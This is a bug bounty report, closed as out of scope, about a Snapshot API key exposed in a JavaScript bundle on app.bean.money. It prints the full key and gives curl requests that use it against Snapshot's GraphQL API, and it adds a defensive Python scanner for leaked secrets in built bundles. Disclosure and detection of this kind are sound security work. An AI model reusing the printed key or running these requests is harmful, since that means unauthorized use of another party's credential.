Report #30684

Report Date
May 4, 2024
Status
Closed
Payout

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation.

Report Info

Report ID

#30684

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • UNAUTHORIZED USE OF APIKEY

Description

Bug Bounty Report

Report Title: API Key Leakage on app.bean.money

Summary:

An API key is being leaked through a JavaScript file hosted on app.bean.money, allowing unauthorized access to company resources via the Snapshot API documentation. JS FILE = https://app.bean.money/assets/index-CuZKWR4O.js

Severity: High

Reproduction Steps:

  1. Go to https://app.bean.money/assets/index-CuZKWR4O.js
  2. Search for ,VITE_SNAPSHOT_API_KEY:"83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59"
  3. I have created some curl requests for this.

Request 1:

    curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59' \
      -H 'content-type: application/json' \
      --data-raw '{"query":"\n{\n space(id:\"snapshot.dcl.eth\"){\n id\n name\n members\n}\n}","variables":null}' \
      --compressed

Request 2:

    curl 'https://hub.snapshot.org/graphql?' \
      -H 'content-type: application/json' \
      -H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59' \
      --data-raw '{"query":"\n{\n space(id:\"snapshot.dcl.eth\"){\n id\n name\n members\n}\n}","variables":null}' \
      --compressed

These are the curl requests.

Impact: The exposure of the API key poses a significant security risk, allowing attackers to potentially access sensitive company data and resources through the Snapshot API.

Affected Endpoint:

Recommendation:

  1. Immediately revoke the leaked API key and generate a new one to prevent further unauthorized access.
  2. Conduct a thorough security audit to identify any additional vulnerabilities or exposures.
  3. Implement stricter access controls and monitoring mechanisms to prevent similar incidents in the future.
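Recommendation 3 asks for monitoring that catches this class of leak before it ships. The following is an added example, not code from the report or from the Bean/Beanstalk project, of a pre-deploy check that scans a built Vite bundle for inlined VITE_ members whose names and values look like credentials (Vite inlines every VITE_-prefixed env var into the client JS, which is how a key ends up in index-*.js). The bundle text and the key value are constructed placeholders.

```python
import re
import math
from typing import List, Dict

# Constructed sample of a Vite-built bundle. The key value is a made-up
# placeholder, not the key from the report.
SAMPLE_BUNDLE = (
    'const e={VITE_APP_NAME:"bean",VITE_API_URL:"https://api.example.invalid",'
    'VITE_SNAPSHOT_API_KEY:"0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",'
    'VITE_FEATURE_FLAG:"true",BASE_URL:"/"};'
)

# Matches minified `VITE_NAME:"value"` object members as emitted by Vite builds.
VITE_MEMBER = re.compile(r'(VITE_[A-Z0-9_]+):"([^"]*)"')
# Variable names that almost always denote credentials.
SECRET_NAME = re.compile(r'(KEY|SECRET|TOKEN|PASSWORD|PRIVATE)', re.I)

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; long random hex/base64 values score high."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def looks_like_secret(name: str, value: str) -> bool:
    """Flag credential-like names whose value is long and high-entropy,
    so URLs and feature flags with the VITE_ prefix are not reported."""
    return (bool(SECRET_NAME.search(name))
            and len(value) >= 32
            and shannon_entropy(value) > 3.0)

def scan_bundle(js: str) -> List[Dict[str, str]]:
    """Return every inlined VITE_ member that looks like a leaked secret.
    Only a prefix of the value is kept so the finding itself does not leak it."""
    findings = []
    for m in VITE_MEMBER.finditer(js):
        name, value = m.group(1), m.group(2)
        if looks_like_secret(name, value):
            findings.append({"name": name,
                             "value_prefix": value[:8] + "...",
                             "offset": str(m.start())})
    return findings

if __name__ == "__main__":
    # In CI, fail the build if this list is non-empty.
    for f in scan_bundle(SAMPLE_BUNDLE):
        print(f"leaked secret candidate {f['name']} at offset {f['offset']} ({f['value_prefix']})")
```

Run it over the real build output (e.g. every file under dist/assets/) rather than the embedded sample; the same pattern is what step 2 of the reproduction finds by hand.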

Proof of concept

Request 1:

    curl 'https://hub.snapshot.org/graphql?apiKey=83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59' \
      -H 'content-type: application/json' \
      --data-raw '{"query":"\n{\n space(id:\"snapshot.dcl.eth\"){\n id\n name\n members\n}\n}","variables":null}' \
      --compressed

Request 2:

    curl 'https://hub.snapshot.org/graphql?' \
      -H 'content-type: application/json' \
      -H 'x-api-key: 83b2ba4f5e943503dad56d4afea4a5205ace935d702cb8c0a1151c995b474f59' \
      --data-raw '{"query":"\n{\n space(id:\"snapshot.dcl.eth\"){\n id\n name\n members\n}\n}","variables":null}' \
      --compressed

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close it, since it is out of scope for the Beanstalk bug bounty program.
  • claimed impact by the whitehat is not in scope for the bug bounty program
  • claimed asset by the whitehat is in scope for the bug bounty program
  • PoC has been submitted to the project
  • claimed severity is in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.